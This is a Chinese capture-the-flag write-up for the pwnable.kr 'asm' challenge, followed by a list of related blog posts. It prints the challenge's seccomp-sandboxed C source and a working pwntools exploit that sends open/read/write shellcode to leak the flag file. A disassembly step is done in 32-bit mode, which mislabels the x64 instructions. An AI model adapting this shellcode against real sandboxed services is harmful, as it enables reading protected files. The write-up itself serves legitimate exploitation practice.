看样子是一道和shellcode有关的题目
连上去看看

目录下好像有个说明的文件查看一下

大概意思就是连接到9026端口 asm再特权下执行并get flag

那我们先看一下asm.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>#define LENGTH 128void sandbox(){scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);if (ctx == NULL) {printf("seccomp error\n");exit(0);}seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);if (seccomp_load(ctx) < 0){seccomp_release(ctx);printf("seccomp error\n");exit(0);}seccomp_release(ctx);
}char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn");   // you are in chroot jail. so you can't use symlink in /tmpsandbox();((void (*)(void))sh)();return 0;
}

这里我们来大概分析整段程序
1.读取我们的输入 建立一个可以执行的缓冲区,将stub拷入内存,并且提示
在此挑战中,您可以在SECCOMP沙箱下运行x64 shellcode
尝试制作仅使用open()/ read()/ write()系统调用输出标志的shellcode

 setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));

2.将我们输入读入stub之后,并开启沙箱环境,执行shellcode

int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn");   // you are in chroot jail. so you can't use symlink in /tmpsandbox();((void (*)(void))sh)();return 0;

我们来查看stub 中 的shellcode格式,运用pwntools查看

Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff")0:   48                      dec    eax1:   31 c0                   xor    eax, eax3:   48                      dec    eax4:   31 db                   xor    ebx, ebx6:   48                      dec    eax7:   31 c9                   xor    ecx, ecx9:   48                      dec    eaxa:   31 d2                   xor    edx, edxc:   48                      dec    eaxd:   31 f6                   xor    esi, esif:   48                      dec    eax10:   31 ff                   xor    edi, edi12:   48                      dec    eax13:   31 ed                   xor    ebp, ebp15:   4d                      dec    ebp16:   31 c0                   xor    eax, eax18:   4d                      dec    ebp19:   31 c9                   xor    ecx, ecx1b:   4d                      dec    ebp1c:   31 d2                   xor    edx, edx1e:   4d                      dec    ebp1f:   31 db                   xor    ebx, ebx21:   4d                      dec    ebp22:   31 e4                   xor    esp, esp24:   4d                      dec    ebp25:   31 ed                   xor    ebp, ebp27:   4d                      dec    ebp28:   31 f6                   xor    esi, esi2a:   4d                      dec    ebp2b:   31 ff                   xor    edi, edi

分析一下这段shellcode 除了将寄存器清0并无其他特殊功能

既然知道了只能使用read,open,write,exit,exit_group 这些函数,这些函数其实只用来读取flag文件来说已经足够了。
那么shellcode部分我们就使用pwntools来编写

from pwn import *context(arch='amd64',os='linux',log_level='info')
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
r = con.connect_remote('localhost',9026)
shellcode = ''
#将字符串压入栈中
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
#字符串已在栈上,也就是rsp
shellcode += shellcraft.open('rsp')
#读取内容到rsp rax是open的返回值
shellcode += shellcraft.read('rax','rsp',100)
#linux下0--->stdin,1--->stdout,2--->stderr.write(1,'rsp',100)相当于将缓冲区中的内容输出
shellcode += shellcraft.write(1,'rsp',100)
#这里就类似监听以及发送
#http://docs.pwntools.com/en/stable/tubes.html
r.recvuntil('give me your x64 shellcode: ')
r.sendline(asm(shellcode))
#打印返回的数据
print r.recvall()

get flag

pwnable.kr asm相关推荐

  1. pwnable.kr 简单题目详细笔记汇总

    文章目录 fd collision bof flag passcode random input leg mistake shellshock coin1 lotto cmd1 cmd2 uaf bl ...

  2. 【pwnable】asm之write up

    首先查看源代码: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <s ...

  3. 【pwnable.kr】day8:leg

    pwnable:leg pwnable.kr:leg 题目链接 question Daddy told me I should study arm. But I prefer to study my ...

  4. 【pwnable.kr】leg

    pwnable从入门到放弃第八题. Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ss ...

  5. pwnable.kr wp leg

    题目 Daddy told me I should study arm. But I prefer to study my leg!Download : http://pwnable.kr/bin/l ...

  6. pwnable.kr之Toddler‘s Bottle前八题知识点记录

    pwn刷题网站地址(点击直达): http://pwnable.kr/play.php 文章目录 第一题 fd 第二题:collision 1.首先是char和int数据类型的转换 2.python实 ...

  7. pwnable.kr lotto题解

    ssh lotto@pwnable.kr -p2222 (pw:guest) 题目源码: #include <stdio.h> #include <stdlib.h> #inc ...

  8. 简单易懂的 pwnable.kr 第六题[random]Writeupt

    简单易懂的 pwnable.kr 第六题[random]Writeupt 题目地址: http://pwnable.kr/play.php 题目: peak小知识 异或^ 据有如下几种性质: 2. 恒 ...

  9. 简单易懂的 pwnable.kr 第三题[bof]Writeupt

    简单易懂的 pwnable.kr 第三题[bof]Writeupt 题目地址:http://pwnable.kr/play.php 点开题目发现: 他给了提示覆盖,并且给了两个网址.分别打开,第一个给 ...

最新文章

  1. rocketmq还要eventbus_ListEventBuses_ListEventBuses_事件总线_C# SDK_阿里云SDK参考_事件总线EventBridge - 阿里云...
  2. MapReduce之单词计数
  3. 如何修改容器的一些参数
  4. 面试题分享【不断更新】
  5. 这是一篇Markdown手册
  6. Android Studio如何导出可供Unity使用的aar插件详解
  7. 数学家告诉你什么时候结束单身?!
  8. hashtable遍历
  9. 【论文研读】【金融】Predicting the direction of stock market prices using random forest
  10. innodb 索引 mysql_InnoDB索引实现
  11. java的ArrayList分析
  12. webpack-Hot Module Replacement(热更新)
  13. 手机前端框架UI库(Frozen UI、WeUI、SUI Mobile)
  14. Kindle刷安卓双系统的方法
  15. 搭建家庭 NAS 服务器有什么好方案?
  16. 鱼跃CMS-轻量开源企业CMS v1.4.6
  17. 俄勒冈州立大学研发脱口秀机器人,全美巡演数十场获好评
  18. window.open,打开窗口与打开新标签页,刷新父窗口数据
  19. css 设置背景图片模糊效果
  20. 云顶之奕pbe服务器注册,云顶之弈手游pbe服

热门文章

  1. SQL中的count语句
  2. 中国九大名牌背后的经典故事
  3. DRBox:可旋转边界框的旋转不变目标检测器
  4. 不到30元,教你硬核送出圣诞祝福!
  5. 机器学习基本概念[持续补充]
  6. 绝地求生服务器维护6.17,绝地求生6月17日维护到几点 绝地求生6月17日更新维护时间详情...
  7. 追风者变引领者:Horwin的技术攀爬
  8. linux /dev/dsp 声卡
  9. 关于Z变换及其物理含义
  10. git: does not have a commit checked out